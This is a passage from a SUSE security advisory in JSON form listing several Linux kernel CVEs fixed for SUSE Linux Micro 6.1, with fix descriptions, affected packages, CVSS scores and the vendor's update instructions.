"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54178"
},
{
"cve": "CVE-2023-54179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Array index may go out of bound\n\nKlocwork reports array \u0027vha-\u003ehost_str\u0027 of size 16 may use index value(s)\n16..19. Use snprintf() instead of sprintf().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54179",
"url": "https://www.suse.com/security/cve/CVE-2023-54179"
},
{
"category": "external",
"summary": "SUSE Bug 1255994 for CVE-2023-54179",
"url": "https://bugzilla.suse.com/1255994"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54179"
},
{
"cve": "CVE-2023-54181",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54181"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix issue in verifying allow_ptr_leaks\n\nAfter we converted the capabilities of our networking-bpf program from\ncap_sys_admin to cap_net_admin+cap_bpf, our networking-bpf program\nfailed to start. Because it failed the bpf verifier, and the error log\nis \"R3 pointer comparison prohibited\".\n\nA simple reproducer as follows,\n\nSEC(\"cls-ingress\")\nint ingress(struct __sk_buff *skb)\n{\n\tstruct iphdr *iph = (void *)(long)skb-\u003edata + sizeof(struct ethhdr);\n\n\tif ((long)(iph + 1) \u003e (long)skb-\u003edata_end)\n\t\treturn TC_ACT_STOLEN;\n\treturn TC_ACT_OK;\n}\n\nPer discussion with Yonghong and Alexei [1], comparison of two packet\npointers is not a pointer leak. This patch fixes it.\n\nOur local kernel is 6.1.y and we expect this fix to be backported to\n6.1.y, so stable is CCed.\n\n[1]. https://lore.kernel.org/bpf/CAADnVQ+Nmspr7Si+pxWn8zkE7hX-7s93ugwC+94aXSy4uQ9vBg@mail.gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54181",
"url": "https://www.suse.com/security/cve/CVE-2023-54181"
},
{
"category": "external",
"summary": "SUSE Bug 1255988 for CVE-2023-54181",
"url": "https://bugzilla.suse.com/1255988"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54181"
},
{
"cve": "CVE-2023-54183",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54183"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: v4l2-core: Fix a potential resource leak in v4l2_fwnode_parse_link()\n\nIf fwnode_graph_get_remote_endpoint() fails, \u0027fwnode\u0027 is known to be NULL,\nso fwnode_handle_put() is a no-op.\n\nRelease the reference taken from a previous fwnode_graph_get_port_parent()\ncall instead.\n\nAlso handle fwnode_graph_get_port_parent() failures.\n\nIn order to fix these issues, add an error handling path to the function\nand the needed gotos.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54183",
"url": "https://www.suse.com/security/cve/CVE-2023-54183"
},
{
"category": "external",
"summary": "SUSE Bug 1255990 for CVE-2023-54183",
"url": "https://bugzilla.suse.com/1255990"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54183"
},
{
"cve": "CVE-2023-54185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: remove BUG_ON()\u0027s in add_new_free_space()\n\nAt add_new_free_space() we have these BUG_ON()\u0027s that are there to deal\nwith any failure to add free space to the in memory free space cache.\nSuch failures are mostly -ENOMEM that should be very rare. However there\u0027s\nno need to have these BUG_ON()\u0027s, we can just return any error to the\ncaller and all callers and their upper call chain are already dealing with\nerrors.\n\nSo just make add_new_free_space() return any errors, while removing the\nBUG_ON()\u0027s, and returning the total amount of added free space to an\noptional u64 pointer argument.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54185",
"url": "https://www.suse.com/security/cve/CVE-2023-54185"
},
{
"category": "external",
"summary": "SUSE Bug 1255984 for CVE-2023-54185",
"url": "https://bugzilla.suse.com/1255984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54185"
},
{
"cve": "CVE-2023-54189",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54189"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore/ram: Add check for kstrdup\n\nAdd check for the return value of kstrdup() and return the error\nif it fails in order to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54189",
"url": "https://www.suse.com/security/cve/CVE-2023-54189"
},
{
"category": "external",
"summary": "SUSE Bug 1255978 for CVE-2023-54189",
"url": "https://bugzilla.suse.com/1255978"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
